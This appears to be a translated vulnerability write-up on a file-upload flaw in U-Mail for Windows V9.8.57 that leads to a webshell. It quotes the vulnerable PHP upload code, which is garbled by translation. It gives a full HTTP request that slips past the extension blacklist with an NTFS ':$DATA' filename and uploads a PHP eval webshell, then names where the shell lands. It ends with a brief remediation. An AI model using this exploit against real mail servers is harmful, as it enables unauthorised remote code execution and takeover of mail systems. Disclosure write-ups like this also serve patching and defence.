Another getshell in the U-mail system

Another getshell in the U-mail system

An improper handling of a certain part of the U-mail system leads to getshell

Version: U-Mail for Windows V9.8.57

Test account: hello0001@fuck.com

Test HOST: windows server 2003 + IIS6 [windows host configuration is the default Mail System Configuration]

First, you need to obtain the user's UserID, because the cache directory path is umail \ WorldClient \ html \ client \ cache \ {userid }\

The interface for getting the user ID is

Http://mail.fuck.com/webmail/client/oab/index.php? Module = operate & action = member-get & page = 1 & orderby = & is_reverse =

1 & keyword = hello0001
 

The userid is 3.



Upload Defects

Vulnerability file: umail \ WorldClient \ html \ client \ mail \ module \ o_attach.php

Code

If (ACTION = "attach-upload-batch" & $ _ FILES) {$ file_name = $ _ FILES ['filedata'] ['name']; $ file_type = $ _ FILES ['filedata'] ['type']; $ file_size = $ _ FILES ['filedata'] ['SIZE']; $ file_source = $ _ FILES ['filedata'] ['tmp _ name']; $ path_target = getusercachepath (); $ not_allow_ext = array ("php", "phps ", "php3", "exe", "bat"); $ res_data = array (); foreach ($ file_source as $ k = >$ v) {$ file_id = makerandomname (); $ File_suffix = getfilenamesuffix ($ file_name [$ k]); if (in_array ($ file_suffix, $ not_allow_ext )) {$ res_data [] = array ("status" => "0", "message" => el ("file upload with this extension is not supported ",""), "filename" => $ file_name [$ k], "filesize" => $ file_size [$ k], "file_id" => $ file_id );} else {$ file_target = $ path_target. $ file_id. ". ". $ file_suffix; if (! Move_uploaded_file ($ v, $ file_target) {$ res_data [] = array ("status" => "0", "message" => el ("file writing error, contact the administrator! "," ")," Filename "=> $ file_name [$ k]," filesize "=> $ file_size [$ k]," file_id "=> $ file_id );} else {$ res_data [] = array ("status" => "1", "filename" => trim ($ file_name [$ k]), "filesize" => $ file_size [$ k], "file_id" => $ file_id ); $ _ SESSION [SESSION_ID] ['Attach _ cache'] [] = array ("id" => $ file_id, "name" => $ file_name [$ k], "type" => "1", "path" => $ file_target, "size" => $ file_size [$ k]) ;}} dump_json ($ res_data );}

PHP files can be uploaded in previous versions. The latest version uses the blacklist mechanism. php files cannot be uploaded, and suffix detection cannot be bypassed. However, with the ADS feature of NTFS, the blacklist mechanism can be bypassed,

To send an email, drag and drop the attachment, add the burpsuite interception package, and change the file name to s. php: $ DATA,

POST /webmail/client/mail/index.php?module=operate&action=attach-upload-batch HTTP/1.1Host: mail.fuck.comProxy-Connection: keep-aliveContent-Length: 233Origin: http://mail.fuck.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary37jD3r27mTgTBrAhAccept: */*Referer: http://mail.fuck.com/webmail/client/mail/index.php?module=view&action=mail-composeAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=3b8305453c65c1039f33832b23268fff------WebKitFormBoundary37jD3r27mTgTBrAhContent-Disposition: form-data; name="Filedata[]"; filename="s.php::$DATA"Content-Type: application/octet-stream<?php @eval($_POST['a']);?>------WebKitFormBoundary37jD3r27mTgTBrAh--

 

The obtained webshell address is the http://mail.fuck.com/webmail/client/cache/3/14178435495.php
 

 

  Solution:

Because the mail system runs php in IIS + Fastcgi mode and is a windows host, it faces many problems, such as parsing vulnerabilities. The simplest solution for the system upload problems is to put the uploaded file directories in a non-web directory.